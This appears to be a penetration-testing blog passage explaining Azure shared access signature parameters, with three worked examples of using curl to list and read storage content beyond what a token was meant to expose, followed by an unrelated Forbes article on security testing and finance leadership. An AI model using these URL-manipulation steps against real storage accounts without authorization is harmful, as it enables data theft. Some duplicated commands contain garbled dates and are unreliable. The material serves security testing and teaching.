The URL path within the storage resource URL identifies a specific resource to be accessed. The same SAS token may provide access to multiple individual resources. For example, if the URL path within an SAS is /profile_pics/user1_profile.jpeg and we observe that our SAS token gives us Read access, then we could attempt to directly access other content by changing the URL path to /profile_pics/user2_profile.jpeg. If the SAS token doesn’t provide List access, then wordlists and context from the application itself will be the most helpful in finding other readable content.

The SAS Token

The SAS token is the second half of the shared access signature and authorizes the request to access the resources specified in the storage resource URL. The token is a series of URL parameters and values which define the constraints of that access. While there are many possible parameters that could be included, we’ll look at the most common and impactful here. 

Signed Permissions (sp)

The permissions granted by the SAS token are defined by the value of the sp parameter. Common values include: 

  • Create (c): Create a new resource.
  • Read (r): Read the resource.
  • Add (a): Add/append to an existing resource.
  • Write (w): Create or write a resource’s content and metadata.
  • Delete (d): Delete a resource.
  • List (l): List objects within a resource.
  • (And much more depending on the SAS type and storage service)

Values can also be combined to allow multiple actions. For example, sp=rl would allow for listing all objects within a resource (such as a container) and the reading the contents of each of those objects. Even sp=rw could be abused by an attacker uploading a large file, and then downloading it many times. This could easily rack up a large Azure bill through egress costs alone.  

This value should be inspected carefully as the SAS token’s permissions may provide much more than the functionality within the application itself. 

Signed Services (ss)

The ss parameter is only included if token belongs to an “account” SAS. An account SAS may provide access to one or more storage services. The value of the ss parameter defines which services a specific SAS token is authorized for. The allowed values are: 

  • Blob (b)
  • Queue (q)
  • Table (t)
  • File (f)

Values can also be combined to provide access to multiple services. For example, ss=bf allows access to the Blob and File services. If multiple values are specified for the ss parameter, be sure to try attempt access to the different service endpoints using the domain names provided above.

Signed Resource Types (srt)

The SAS token is scoped to specific types of resources. If the SAS token belongs to an account SAS, the allowed resource types are defined by the value of the srt parameter. Allowed values include:

  • Service (s): Access to service-level APIs (e.g., Get/Set Service Properties, Get Service Stats, List Containers/Queues/Tables/Shares)
  • Container (c): Access to container-level APIs (e.g., Create/Delete Container, Create/Delete Queue, Create/Delete Table, Create/Delete Share, List Blobs/Files and Directories)
  • Object (o): Access to object-level APIs for blobs, queue messages, table entities, and files (e.g. Put Blob, Query Entity, Get Messages, Create File, etc.)

Like before, these values can be combined. For example, srt=co would provide permissions to both individual objects (e.g. blobs and files) and their logical parents (e.g. containers and directories).

Signed Resources (sr)

If the SAS token does not belong to an account SAS, then it belongs to a user SAS or service SAS. For our purposes, there are a couple important differences between these two SAS types and the account SAS type:

  1. A user SAS or service SAS can only provide access to a single service. A user SAS is limited to only the Blob service. A service SAS is limited to only one of the four storage services: Blob, File, Queue or Table.
  2. The permissions of a user SAS or service SAS may be more restricted than the SAS token suggests. The permissions of a user SAS are limited by the permissions of the user who signed the SAS. The permissions of a service SAS may be restricted by a stored access policy.

Because a user/service SAS is limited to a single service, the ss parameter will not be present in the SAS token. Additionally, the user/service token uses the sr parameter to define allowed resources, rather than the srt parameter. Some of the allowed values for the sr parameter are:

  • Blob (b): Grants access to the content and metadata of the blob.
  • Container (c): Grants access to the content and metadata of any blob in the container, and to the list of blobs in the container.
  • Directory (d): Grants access to the content and metadata of any blob in the directory, and to the list of blobs in the directory.
  • File (f): Grants access to the content and metadata of the file within the File service.
  • Share (s): This grants access to the content and metadata of any file in the share, and to the list of directories and files in the share, within the File service.

Signed Expiry (se)

The value of the se parameter defines when the SAS becomes invalid. Applications are allowed to set this very far into the future, even hundreds of years! While it may be convenient to avoid dealing with frequently generating new SAS tokens, there are a couple problems you may run into:

  1. The SAS may provide a malicious user long-term access into the storage account, even if that user is removed or banned from the application itself.
    1. This is especially dangerous if the application changes how it uses the storage account. For example, consider a web application that stores users’ public pictures in a storage account. Because these are all public pictures, the application hands out long-lived SAS tokens to all users allowing them to read all the blobs directly from cloud storage. Later, the web application rolls out a feature allowing users to store private pictures as well. If the application stores the private pictures in the same storage account, then the previously issued SAS tokens may allow users to access the private pictures as well. 
  2. SAS tokens can be difficult to revoke. Depending on the SAS type, revocation may require the storage account keys to be rotated. This would impact any existing use of those keys (such as other applications and other SAS tokens). 

Signed IP (sip)

The value of the sip parameter defines an IP address or range of addresses which are allowed to access the resources. The request to interact with the stored content must be received from one of these addresses, otherwise Azure will deny the request. If the same SAS works on one machine but not another, this could be the culprit. 

Signature (sig)

The above list of parameters is not exhaustive and not all the parameters will be present for all SAS tokens. However, every SAS token is required to have the sig parameter. This is a Base64-encoded SHA256 HMAC and provides integrity that the SAS token is unaltered. Any changes we make to the SAS token will be detected through this signature, and our requests will be rejected. But keep in mind, we’re free to edit and manipulate the storage resource URL, so long as the SAS token remains unchanged. 

Examples

Now that we understand the various components of a shared access signature, let’s take a look at a few examples. With each example, we’ll break down the SAS and see how we could abuse the access it grants us.

Example 1 – User SAS

Let’s say we encounter the following SAS during a pentest. What could we do with it?

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D

If we follow that link, we’re returned some simple content: 

curl
“https://testsastokenaccount.blob.core.windows.net/testsastokencont
ainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11
-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-98
42-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=20
21-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04
&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%
2BRe5DsC%2FzPE5M%3D”
Hello World
curl “https://testsastokenaccount.blob.core.windows.net/testsastokencont ainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11 -29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-98 42-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=20 21-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04 &spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC% 2BRe5DsC%2FzPE5M%3D” Hello World

Having access to that content is fine (and likely required for the functionality of the web app we’re testing), but let’s see if this SAS gives us any more access. Let’s start by identifying our key components and seeing what information that gives us:

  • Resource URL
    • Domain Name: testsastokenaccount.blob.core.windows.net
      • We can identify the storage account name: testsastokenaccount
      • We can identify we’re authorized for Blob storage: blob.core.windows.net
    • URL Path: /testsastokencontainer/testsastokendirectory/testsastokenblob.txt
      • We can identify the container name: testsastokencontainer
      • We can identify a directory within the container: testsastokendirectory
      • We can identity the blob we’re accessing: testsastokenblob.txt
  • SAS Token:
    • Signed Permissions (sp): rwl
      • We’re authorized for read, write and list actions
    • Signed Resources (sr): c
      • We’re authorized to access the content and metadata of any blob in the container, and to the list of blobs in the container.
      • This is a user or service SAS, not an account SAS, because this parameter is present instead of the srt parameter.
    • Signed Expiry (se): 2021-12-07T08:00:00Z
      • The token is valid until this time. 
    • Signed Object Id (skoid): c7352c6b-06c4-40ce-9842-9dff0f004dbe
      • This is a required parameter for a user SAS, confirming the type of SAS. 
    • The additional values are required for the SAS token but are not very useful to us.

From this breakdown, we have a couple key takeaways:

  1. We have read, write and list permissions over the blobs within the testsastokencontainer container. 
  2. We have a user SAS which is limited to Blob storage and may be limited by the permissions of the principal which created the SAS. 

Let’s use our list permissions to find other blobs within the container. To do this, we need to make 2 edits to our original SAS:

  1. We need to change the path in the resource URL to only reference the container, not a specific blob.
    1. Original: /testsastokencontainer/testsastokendirectory/testsastokenblob.txt
    2. New: /testsastokencontainer
  2. We need to add the following URL parameters before or after the SAS token to perform the list action on the container: restype=container&comp=list

With both changes, our new SAS becomes:

https://testsastokenaccount.blob.core.windows.net/testsastokencont
ainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08:00:00Z
&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004d
be&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00
:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=
2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2Fz
PE5M%3D
https://testsastokenaccount.blob.core.windows.net/testsastokencont ainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08:00:00Z &se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004d be&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00 :00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv= 2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2Fz PE5M%3D

Let’s make a request to this URL (and nicely format the XML output):

curl -s “https://testsastokenaccount.blob.core.windows.net/testsas
tokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08
:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff
0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29
T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https
&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%
2FzPE5M%3D” | xmllint –format –
<?xml version=“1.0” encoding=“utf-8”?>
<EnumerationResults ServiceEndpoint=“https://testsastokenaccount.
blob.core.windows.net/” ContainerName=“testsastokencontainer”>
<Blobs>
<Blob>
<Name>testsastokendirectory/my_secret_file.txt</Name>
<Properties>
[TRUNCATED]
</Properties>
<OrMetadata/>
</Blob>
<Blob>
<Name>testsastokendirectory/testsastokenblob.txt</Name>
<Properties>
[TRUNCATED]
</Properties>
<OrMetadata/>
</Blob>
</Blobs>
<NextMarker/>
</EnumerationResults>
curl -s “https://testsastokenaccount.blob.core.windows.net/testsas tokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08 :00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff 0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29 T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https &sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC% 2FzPE5M%3D” | xmllint –format – <?xml version=”1.0″ encoding=”utf-8″?> <EnumerationResults ServiceEndpoint=”https://testsastokenaccount. blob.core.windows.net/” ContainerName=”testsastokencontainer”> <Blobs> <Blob> <Name>testsastokendirectory/my_secret_file.txt</Name> <Properties> [TRUNCATED] </Properties> <OrMetadata/> </Blob> <Blob> <Name>testsastokendirectory/testsastokenblob.txt</Name> <Properties> [TRUNCATED] </Properties> <OrMetadata/> </Blob> </Blobs> <NextMarker/> </EnumerationResults>

In addition to the testsastokenblob.txt blob we already know about, the response also lists a my_secret_file.txt blob in the same directory. Because we have read access to all blobs in the container, we can update our SAS to reference this blob and read its contents:

curl “https://testsastokenaccount.blob.core.windows.net/testsastok
encontainer/testsastokendirectory/my_secret_file.txt?sp=rwl&st=202
1-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce
-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=
2021-11-29T08:00:00Z&ske=20200:00Z&sks=b&skv=2020-08-04&spr=https&
sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2F
zPE5M%3D”
Username: user123
Password: password123
curl “https://testsastokenaccount.blob.core.windows.net/testsastok encontainer/testsastokendirectory/my_secret_file.txt?sp=rwl&st=202 1-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce -9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt= 2021-11-29T08:00:00Z&ske=20200:00Z&sks=b&skv=2020-08-04&spr=https& sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2F zPE5M%3D” Username: user123 Password: password123

And just like that, we’ve taken our original SAS and abused our privileges to access content we aren’t intended to have. 

Example 2 – Account SAS

Let’s consider another SAS:

https://testsastokenaccount.file.core.windows.net/testfileshare/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D

Again, we could follow the link to download the content:

curl “https://testsastokenaccount.file.core.windows.net/testfilesh
are/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=b
f&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&sp
r=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D”
Hello Again
curl “https://testsastokenaccount.file.core.windows.net/testfilesh are/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=b f&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&sp r=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D” Hello Again

Let’s perform the same breakdown as before to see what information the SAS itself provides:

  • Resource URL
    • Domain Name: testsastokenaccount.file.core.windows.net
      • We can identify the storage account name: testsastokenaccount
      • We can identify we’re authorized for File storage: file.core.windows.net
    • URL Path: /testfileshare/testfilesharedirectory/testsastokenfile.txt
      • We can identify the share name: testfileshare
      • We can identify a directory within the share: testfilesharedirectory
      • We can identity the file we’re accessing: testsastokenfile.txt
  • SAS Token:
    • Signed Permissions (sp): rl
      • We’re authorized for read and list actions.
    • Signed Services (ss): bf
      • We’re authorized for the Blob and File services.
      • This must be an account SAS since it provides access to multiple services. 
    • Signed Resource Types (srt): sco
      • We’re authorized for all service-level, container-level and object-level APIs.
    • Signed Expiry (se): 2500-11-30T08:00:00Z
      • The token is valid for hundreds of years. 
    • The additional values are required for the SAS token but are not very useful to us.

Our key observations for this SAS are:

  1. We can read containers and objects across the File and Blob storage services. 
  2. We are using an account SAS which does not impose hidden restrictions. 
  3. We have a very long-lived SAS which can be used to persist access until the storage account keys are rotated.

Let’s get started using these privileges. As we saw in Example 1, we can update our SAS to list other files in the same file share and directory with the following changes:

  1. We need to change the path in the resource URL to only reference the directory, not a specific blob.
    1. Original: /testfileshare/testfilesharedirectory/testsastokenfile.txt
    2. New: /testfileshare/testfilesharedirectory
  2. We need to add the following URL parameters before or after the SAS token to perform the list action on the directory: restype=directory&comp=list

Like before, we’ll merge these changes into our SAS and check out the results:

curl -s ‘https://testsastokenaccount.file.core.windows.net/testfil
eshare/testfilesharedirectory/?restype=directory&comp=list&sv=2020
-0804&ss=bf&srt=sco&sp=rl&se=250011-30T08:00:00Z&st=202111-30T
08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw
1TU09JEY%3D’ | xmllint –format –
<?xml version=“1.0” encoding=“utf-8”?>
<EnumerationResults ServiceEndpoint=“https://testsastokenaccount.
file.core.windows.net/” ShareName=“testfileshare” DirectoryPath=
“testfilesharedirectory/”>
<Entries>
<File>
<Name>another_secret_file.txt</Name>
<Properties>
<Content-Length>40</Content-Length>
</Properties>
</File>
<File>
<Name>testsastokenfile.txt</Name>
<Properties>
<Content-Length>11</Content-Length>
</Properties>
</File>
</Entries>
<NextMarker/>
</EnumerationResults>
curl -s ‘https://testsastokenaccount.file.core.windows.net/testfil eshare/testfilesharedirectory/?restype=directory&comp=list&sv=2020 -08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T 08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw 1TU09JEY%3D’ | xmllint –format – <?xml version=”1.0″ encoding=”utf-8″?> <EnumerationResults ServiceEndpoint=”https://testsastokenaccount. file.core.windows.net/” ShareName=”testfileshare” DirectoryPath= “testfilesharedirectory/”> <Entries> <File> <Name>another_secret_file.txt</Name> <Properties> <Content-Length>40</Content-Length> </Properties> </File> <File> <Name>testsastokenfile.txt</Name> <Properties> <Content-Length>11</Content-Length> </Properties> </File> </Entries> <NextMarker/> </EnumerationResults>

And just like before, we see there are additional contents in the same directory (another_secret_file.txt). We can download this directly too by changing our original storage resource URL to point to that file, just like we did in Example 1. 

Since we have an account SAS with access to Blob storage, let’s utilize that access too! We’ll update our SAS to enumerate all blob storage containers within the storage account:

  1. We’ll need to change the domain name to reference the Blob service rather than File service.
    1. Original: file.core.windows.net
    2. New: blob.core.windows.net
  2. We need to remove the path in the resource URL since we’re interacting with the top-level service.
    1. Original: /testfileshare/testfilesharedirectory/testsastokenfile.txt
    2. New: /
  3. We need to add the following URL parameters before or after the SAS token to list all containers: comp=list

We’ll merge in these changes, send off the request, and review the results:

curl -s ‘https://testsastokenaccount.blob.core.windows.net/?comp=
list&sv=20200804&ss=bf&srt=sco&sp=rl&se=250011-30T08:00:00Z&st=
202111-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc
%2BV7o%2Fw1TU09JEY%3D’ | xmllint –format –
<?xml version=“1.0” encoding=“utf-8”?>
<EnumerationResults ServiceEndpoint=“https://testsastokenaccount.
blob.core.windows.net/”>
<Containers>
<Container>
<Name>secretcontainer</Name>
<Properties>
[TRUNCATED]
</Properties>
</Container>
<Container>
<Name>testsastokencontainer</Name>
<Properties>
[TRUNCATED]
</Properties>
</Container>
</Containers>
<NextMarker/>
</EnumerationResults>
curl -s ‘https://testsastokenaccount.blob.core.windows.net/?comp= list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st= 2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc %2BV7o%2Fw1TU09JEY%3D’ | xmllint –format – <?xml version=”1.0″ encoding=”utf-8″?> <EnumerationResults ServiceEndpoint=”https://testsastokenaccount. blob.core.windows.net/”> <Containers> <Container> <Name>secretcontainer</Name> <Properties> [TRUNCATED] </Properties> </Container> <Container> <Name>testsastokencontainer</Name> <Properties> [TRUNCATED] </Properties> </Container> </Containers> <NextMarker/> </EnumerationResults>

Looking at the output, we see the storage container from Example 1 (testsastokencontainer) and we also see another storage container: secretcontainer. We’ve already seen how to edit the SAS to list blobs in a container and read individual blobs, so let’s take a peek at what’s inside:

curl -s ‘https://testsastokenaccount.blob.core.windows.net/secret
container?restype=container&comp=list&sv=20200804&ss=bf&srt=sco
&sp=rl&se=250011-30T08:00:00Z&st=202111-30T08:00:00Z&spr=https
&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D’
| xmllint –format –
<?xml version=“1.0” encoding=“utf-8”?>
<EnumerationResults ServiceEndpoint=“https://testsastokenaccount.
blob.core.windows.net/” ContainerName=“secretcontainer”>
<Blobs>
<Blob>
<Name>last_secret_file.txt</Name>
<Properties>
[TRUNCATED]
</Properties>
<OrMetadata/>
</Blob>
</Blobs>
<NextMarker/>
</EnumerationResults>
curl -s ‘https://testsastokenaccount.blob.core.windows.net/secret container?restype=container&comp=list&sv=2020-08-04&ss=bf&srt=sco &sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https &sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D’ | xmllint –format – <?xml version=”1.0″ encoding=”utf-8″?> <EnumerationResults ServiceEndpoint=”https://testsastokenaccount. blob.core.windows.net/” ContainerName=”secretcontainer”> <Blobs> <Blob> <Name>last_secret_file.txt</Name> <Properties> [TRUNCATED] </Properties> <OrMetadata/> </Blob> </Blobs> <NextMarker/> </EnumerationResults>
curl -s ‘https://testsastokenaccount.blob.core.windows.net/secretc
ontainer/last_secret_file.txt? &sv=20200804&ss=bf&srt=sco&sp=rl
&se=250011-30T08:00:00Z&st=202111-30T08:00:00Z&spr=https&sig=p
Z4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D’
These are the super secret contents!
curl -s ‘https://testsastokenaccount.blob.core.windows.net/secretc ontainer/last_secret_file.txt? &sv=2020-08-04&ss=bf&srt=sco&sp=rl &se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=p Z4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D’ These are the super secret contents!

By analyzing and manipulating the original SAS for a specific file in the File storage service, we were able to pivot to the Blob storage service, find a new container and read the contents of a file within. 

Example 3 – Read-Only Account SAS

As a final example, let’s consider the following SAS:

https://otheraccount.blob.core.windows.net/container-dev/content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D

And the content provided by that SAS looks pretty mundane: 

curl “https://otheraccount.blob.core.windows.net/container-dev/
content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00
Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2
F5gl2G6FsSMtcFOuNrthM%3D”
Dev Content 1
curl “https://otheraccount.blob.core.windows.net/container-dev/ content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00 Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2 F5gl2G6FsSMtcFOuNrthM%3D” Dev Content 1

For one last time, we’ll break down our SAS:

  • Resource URL
    • Domain Name: otheraccount.blob.core.windows.net
      • We can identify the storage account name: otheraccount
      • We can identify we’re authorized for Blob storage: blob.core.windows.net
    • URL Path: /container-dev/content1.txt
      • We can identify the container name: container-dev
      • We can identity the blob we’re accessing: content1.txt
  • SAS Token:
    • Signed Permissions (sp): r
      • We’re authorized for only the read actions.
    • Signed Services (ss): b
      • We’re only authorized for the Blob. 
      • This must be an account because this parameter is set. 
    • Signed Resource Types (srt): o
      • We’re only authorized for all object-level APIs.
    • The additional values are required for the SAS token but are not very useful to us.

We can see that this SAS is much more restricted. We won’t be able to hop between services or use the list action like before. But with a little bit of luck, we won’t even need that. 

Looking at the blob name content1.txt, it’s worth checking if there are any other blobs we could guess. Let’s update our SAS to point to content2.txt and see what happens.

curl “https://otheraccount.blob.core.windows.net/container-dev/
content2.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00
Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2
F5gl2G6FsSMtcFOuNrthM%3D”
Dev Content 2
curl “https://otheraccount.blob.core.windows.net/container-dev/ content2.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00 Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2 F5gl2G6FsSMtcFOuNrthM%3D” Dev Content 2

It worked! Even though we couldn’t list all the blobs, if we successfully guess the blob name (or it’s disclosed to us through other means) we can still gain access to it. Within a real web application, this may lead to an Insecure Direct Object Reference (IDOR) vulnerability. 

Let’s take a look at that container name too. If we were given access to container-dev then let’s check for container-prod as well. 

curl “https://otheraccount.blob.core.windows.net/container-prod/
content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z
&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5
gl2G6FsSMtcFOuNrthM%3D”
Prod Content 1
curl “https://otheraccount.blob.core.windows.net/container-prod/ content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z &st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5 gl2G6FsSMtcFOuNrthM%3D” Prod Content 1

Nice! We’re able to directly reference blobs within other containers within the same storage account if we can guess the correct URL path. As you could imagine, it’s not too difficult to use wordlists to build our guesses and test different URLs. In fact, the MicroBurst toolkit already provides Invoke-EnumerateAzureBlobs which enables the enumeration of public blobs and containers. Karl Fosaaen has previously written about this script on the NetSPI blog

This example shows that even a fairly limited SAS has the potential to still be abused. In particular, the account SAS type can provide vast access into a storage account and is a prime target for pentesters. 

Conclusion

Whenever we’re given direct access to Azure storage accounts through a shared access signature, we should take a close look to understand our authorization. While the SAS has many parts, it’s not too difficult to break down if you know the most important parts. Hopefully this guide can serve as a reference for the next time you come across an SAS during a pentest and help you find new content. 

Special thanks to Karl Fosaaen for the blog suggestion and Josh Magri for reviewing this write up. 

NetSPI is always looking for skilled penetration testers to join our team! Visit https://netspi.com/careers to explore our open roles.

Back

Forbes: Three Reasons To Include Finance And Risk Leadership In Security Testing Discussions

On January 5, 2022, NetSPI CTO Travis Hoyt published an article for the Forbes Technology Council. Read the full article below or online here.

+ + +

Think security is solely the responsibility of the chief information security officer (CISO)? Think again. Finance and risk C-suite leadership have a critical role to play in preventing cybersecurity breaches.

Cybersecurity is a real loss event that has a potentially negative financial impact on a business — and it should be treated as such.  

Case in point: According to Digital Hands’ “The Cost of Doing Nothing” report, damages from destructive malware and ransomware were the most expensive cyber attacks at $4.52 million and $4.22 million, respectively. Beyond direct financial losses (e.g., ransom paid), the indirect costs of a ransomware attack — regulatory fines, operational downtime, reputational damage, insurance premiums and legal costs — are also on the rise.

In reality, ransomware and other cybersecurity incidents are a revenue hit. It’s time for security and technology leaders to include finance and risk leadership in cybersecurity conversations, and security testing is a great place to start. Read on for three reasons why.

To Better Understand The Business Risk 

For too long, security testing and vulnerability management activities, such as penetration testing, red teaming and breach and attack simulation, among others, have been discussed in an IT or security silo. That’s not where those discussions should be held.

Security professionals must communicate with finance and business leadership to better understand how the organization makes money. At the end of the day, that is what is core to your business and what we are ultimately protecting from cyber threats. Reshaping the way we think about security testing — moving from an engineering focus to a business risk perspective — can help us make more thoughtful decisions on which risks to prioritize, the cybersecurity activities to invest in and which business decisions have limited or negative ROI when incorporating cybersecurity implications.

To Validate And Champion For Cybersecurity Spend 

Cybersecurity is often viewed as a cost center, but it should be viewed as a business enabler. When putting your security controls to the test, looping in the CFO and CRO can be invaluable to validate spend and measure ROI. 

CFOs, CROs and the like have a unique understanding of loss potential and can help CISOs identify the level of security investment and resources necessary to protect the organization, in line with the organization’s risk appetite. 

A running list of vulnerabilities is not the only deliverable you receive following a penetration test. Not anymore, at least. Modern penetration testing models, such as penetration testing as a service (PTaaS), can help you validate your existing security controls (e.g., SIEM, EDR, firewalls) to thoroughly understand the scope of your control coverage.

“Do my controls give me the level of coverage I need to say that I’m effectively securing this value stream?” is the question that CISOs should ask themselves. Speaking the language of the C-suite — in dollars and cents — will help CISOs create security champions among the leadership team. In addition to reporting the critical vulnerabilities and how they are being remediated, showcase that each security investment is working as intended — or not — through your pentesting assessments.

To Shift Your Vulnerability Management Mindset

Today, there are organizations that still implement a “spray and pray” vulnerability management approach. They rely solely on automated scanners for their testing, without human context. Just as businesses are not created equal, all vulnerabilities are not created equal. It requires human intuition to identify the greatest risks to your business and prioritize the remediation efforts. Tech-enabled experts can bring that intuition to bear in an efficient way so as to enable greater coverage in both breadth and depth.

The threat landscape is constantly changing and testing annually is no longer good enough. Businesses are dynamic — CFOs and CROs know this well — so why don’t today’s testing strategies align with this?

Security testing is a critical component of the CFO and CRO’s roles as they focus on adhering to regulatory bodies and auditors in their day to day. An annual, check-the-box pentest may help them adhere to compliance requirements today, but those requirements are evolving. As a risk-based vulnerability management approach gains traction, continuous testing will become the standard.

Applications change and new releases are rapid-fire. Executives must be committed to investing in security, but also investing in process improvements that enable this type of testing to occur more frequently. Reduced friction security engagements can provide reassurances that unidentified risks are not making it into production with each feature release. Work with your CFOs and CROs to help them understand the concept of risk-based vulnerability management and establish a plan for always-on testing, such as implementing a pentesting strategy.  

The goal of security testing is no longer to find as many vulnerabilities as possible. It’s now shifting to a model where we are identifying the vulnerabilities that create the greatest risk to an organization in real time. Establishing relationships between security and risk/finance leadership is key to achieving a risk-based security testing program.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X